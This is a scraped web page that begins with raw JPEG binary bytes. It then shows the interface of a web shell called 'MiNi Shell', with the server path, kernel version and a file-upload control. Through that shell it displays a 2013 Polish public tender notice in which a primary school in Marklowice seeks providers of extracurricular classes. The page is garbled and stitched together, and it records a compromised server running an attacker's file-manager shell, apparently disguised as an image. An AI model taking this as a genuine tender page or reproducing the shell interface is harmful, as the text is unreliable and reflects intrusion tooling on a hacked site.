JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130423/161716-N-2013.html

<p class="kh_header"><b>Marklowice: Świadczenie usług edukacyjnych polegających na prowadzeniu zajęć w Szkole Podstawowej Nr 1 w Marklowicach przy ul. Wyzwolenia 160; 44-321 Marklowice w ramach Projektu pn.: Bieg na orientację - orientuj się w życiu Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 161716 - 2013; data zamieszczenia: 23.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 1 im. Adama Mickiewicza , ul. Wyzwolenia 160, 44-321 Marklowice, woj. śląskie, tel. 32 4550367, faks 32 4550367.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp1marklowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych polegających na prowadzeniu zajęć w Szkole Podstawowej Nr 1 w Marklowicach przy ul. Wyzwolenia 160; 44-321 Marklowice w ramach Projektu pn.: Bieg na orientację - orientuj się w życiu Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia: 
1. Pakiet 1: 60 godzin dydaktycznych warsztatów zajęć z pedagogiem. Przewiduje się organizację 5 warsztatów. Warsztaty przeprowadzone zostaną w 12 klasach. Ich celem będzie wspomaganie procesu uczenia się, pokazanie uczniom i uczennicom skutecznych metod rozwiązywania problemów w nauce. 
2. Pakiet 2: 124 godziny dydaktyczne zajęć w ramach Angielskiego Kółka Teatralnego. Zajęcia będą prowadzone w 2 grupach ośmioosobowych w wymiarze 2 godzin dydaktycznych w tygodniu dla każdej grupy. Celem zajęć jest poszerzenie zakresu słownictwa i wyrażeń przydatnych w komunikowaniu się, kształtowanie pewności siebie w komunikowaniu się w języku obcym, doskonalenie umiejętności pamięciowego opanowania tekstu. Rezultatem zajęć będzie wystawienie minimum 1 przedstawienia w roku szkolnym. 
3. Pakiet 3: 124 godziny dydaktyczne zajęć w ramach Active Reading. Zajęcia będą prowadzone w 4 grupach sześcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest czytanie w celu rozwijania słownictwa, kształtowanie umiejętności czytania ze zrozumieniem tekstu oraz szybkiego czytania i zapamiętywania, wykonywanie dodatkowych zadań w oparciu o słowa i wyrażenia poznane w czytankach. 
4. Pakiet 4: 62 godziny dydaktyczne zajęć w ramach Bookworms Club. Zajęcia będą prowadzone w 2 grupach sześcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest praca z tekstem w wersji oryginalnej (głównie bajki, baśnie, itp.) oraz poznawanie realiów i kultury danego obszaru językowego. 
5. Pakiet 5: 124 godziny dydaktyczne zajęć w ramach kółka teatralnego. Zajęcia będą prowadzone w 4 grupach siedmioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest zaspokojenie potrzeby twórczej aktywności, przygotowanie do odbioru dzieł sztuki, doskonalenie umiejętności pracy w zespole, aktywne uczestnictwo w życiu kulturalnym, doskonalenie umiejętności językowych. 
6. Pakiet 6: 186 godzin dydaktycznych w ramach zajęć Moja firma - kółko młodych przedsiębiorców. Zajęcia będą prowadzone w 6 grupach dziesięcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest rozwijanie przedsiębiorczości, kreatywności, umiejętności podejmowania decyzji i samodzielności, przygotowanie propozycji swojej firmy. 
7. Pakiet 7: 124 godziny dydaktyczne zajęć w ramach Kółka Miłośników krajów anglojęzycznych. Zajęcia będą prowadzone w 2 grupach sześcioosobowych w wymiarze 2 godzin dydaktycznych w tygodniu dla każdej grupy. Celem zajęć jest poznawanie kultury, historii i obyczajów krajów anglojęzycznych. W pracy wykorzystana zostanie metoda Webquestu. 
8. Pakiet 8: 372 godziny zajęć dydaktycznych w ramach kółka matematycznego. Zajęcia będą prowadzone w 3 grupach ośmioosobowych w wymiarze 2 godzin dydaktycznych w tygodniu w każdej grupie. Celem zajęć jest poszerzenie wiedzy i umiejętności matematycznych, również pod kątem udziału w konkursie Kangur. 
9. Pakiet 9: 62 godziny dydaktyczne w ramach zajęć Words, Words, Words. Zajęcia będą prowadzone w 2 grupach pięcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest utrwalenie słownictwa oraz równoległe ćwiczenie czterech sprawności językowych: mówienia, czytania, pisania i rozumienia ze słuchu. W trakcie zajęć wykorzystywane będą gry dydaktyczne, zabawy, quizy. Uczniowie poznają różne techniki pamięciowe pomagające zapamiętać pisownię wyrazów. 
10. Pakiet 10: 124 godziny dydaktyczne w ramach zajęć English in games and projects. Zajęcia będą prowadzone w 4 grupach sześcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest nauka słownictwa z wykorzystaniem gier i metody projektu, także zajęcia w terenie, np. dialogi w restauracji, spacer wg wskazanej w języku angielskim drogi, opis krajobrazu, zabawy ruchowe. 
11. Pakiet 11: 124 godziny dydaktyczne w ramach zajęć Z komputerem w życie. Zajęcia będą prowadzone w 2 grupach pięcioosobowych w wymiarze 2 godzin dydaktycznych w tygodniu dla każdej grupy. Celem zajęć jest praktyczna nauka obsługi pakietu Office. 
12. Pakiet 12: 124 godziny dydaktyczne w ramach zajęć Czytam i piszę bez problemu. Zajęcia będą prowadzone w 4 grupach pięcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest praca z uczniami, mającymi trudności w zakresie czytania i pisania, których charakteryzuje wolne tempo pracy, bierność, słaba koncentracja uwagi czy słaba pamięć. 
13. Pakiet 13: 124 godziny dydaktyczne w ramach zajęć Język polski to podstawa. Zajęcia będą prowadzone w 4 grupach sześcioosobowych w wymiarze 1 godziny dydaktycznej w tygodniu dla każdej grupy. Celem zajęć jest rozwijanie umiejętności językowych uczniów. 
14. Pakiet 14: 248 godzin dydaktycznych zajęć logopedycznych. Zajęcia będą prowadzone w 4 grupach dziesięcioosobowych w wymiarze 2 godzin dydaktycznych w tygodniu dla każdej grupy. Celem zajęć jest sprawne posługiwanie się językiem, opanowanie właściwej techniki mówienia, wyraziste wymawianie głosek i wyrazów. 
15. Pakiet 15: 372 godziny zajęć dydaktycznych z matematyki. Zajęcia będą prowadzone w 3 grupach ośmioosobowych w wymiarze 2 godzin dydaktycznych w tygodniu dla każdej grupy. Celem zajęć jest utrwalenie wiedzy matematycznej i rozwijanie sprawności rachunkowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  jeżeli wykonawca wykaże, iż dysponuje co najmniej jedną osobą do realizacji każdego pakietu zamówienia posiadającymi następujące kwalifikacje tj.:
1. Pakiet 1 - zajęcia z pedagogiem:
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
2. Pakiet 2 - zajęcia prowadzone w ramach Angielskiego Kółka Teatralnego:
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
3. Pakiet 3 - zajęcia prowadzone w ramach Active Reading:
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
4. Pakiet 4 - zajęcia prowadzone w ramach Bookworms Club: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
5. Pakiet 5 - zajęcia prowadzone w ramach kółka teatralnego: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
6. Pakiet 6 - zajęcia prowadzone w ramach zajęć Moja firma - kółko młodych przedsiębiorców: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
7. Pakiet 7 - zajęcia prowadzone w ramach Kółka Miłośników krajów anglojęzycznych: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
8. Pakiet 8 - zajęcia prowadzone w ramach kółka matematycznego:
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
9. Pakiet 9 - zajęcia prowadzone w ramach zajęć Words, Words, Words: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
10. Pakiet 10 - zajęcia prowadzone w ramach zajęć English in games and Project: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
11. Pakiet 11 - zajęcia prowadzone w ramach zajęć Z komputerem w życie: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
12. Pakiet 12 - zajęcia prowadzone w ramach zajęć Czytam i piszę bez problemu: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
13. Pakiet 13 - zajęcia prowadzone w ramach zajęć Język polski to podstawa: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
14. Pakiet 14 - zajęcia prowadzone przez logopedę: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne
15. Pakiet 15 - zajęcia z matematyki: 
wykształcenie wyższe magisterskie:
ukończone studia magisterskie na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami, lub
ukończone studia magisterskie na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć, lub
ukończone studia magisterskie na kierunku (specjalności) innym niż wymieniony w pkt 1 i 2 i studia podyplomowe w zakresie nauczanego przedmiotu lub prowadzonych zajęć
przygotowanie pedagogiczne

Zamawiający dopuszcza łączenie wyżej wymienionych funkcji przez tę samą osobę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Warunkiem, koniecznym ze strony Wykonawcy, do zawarcia umowy będzie dostarczenie Zamawiającemu przed jej zawarciem umowy następujących dokumentów:
1. Dokumentów potwierdzających wykształcenie, kwalifikacje i doświadczenie zawodowe.
2. Oświadczenie o niewystępowaniu konfliktu interesów oraz o unikaniu podwójnego finansowania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany postanowień umowy, która może nastąpić w trybie przewidzianym przez Pzp za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, z uwzględnieniem art. 144 ust. 1 Pzp, w następującym zakresie: 
1.1 zmiany terminu płatności z przyczyn niezależnych od Zamawiającego, w tym w szczególności w wyniku zadziałania okoliczności siły wyższej,
2. Zamawiający dopuszcza także możliwość zmian treści zawartej umowy w następujących okolicznościach:
2.1. gdy nastąpi zmiana obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
2.2. gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności instytucją Zarządzającą, Pośredniczącą I i II stopnia, a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia,
2.3. gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia,
2.4. gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji przedmiotu zamówienia. 
3. Zmiany umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.
4. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp1marklowice.pl oraz www.marklowice.pl (BIP Urzędu Gminy)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 1 im. Adama Mickiewicza
ul. Wyzwolenia 160
44-321 Marklowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2013 godzina 10:00, miejsce: Szkoła Podstawowa Nr 1 im. Adama Mickiewicza
Sekretariat
ul. Wyzwolenia 160
44-321 Marklowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




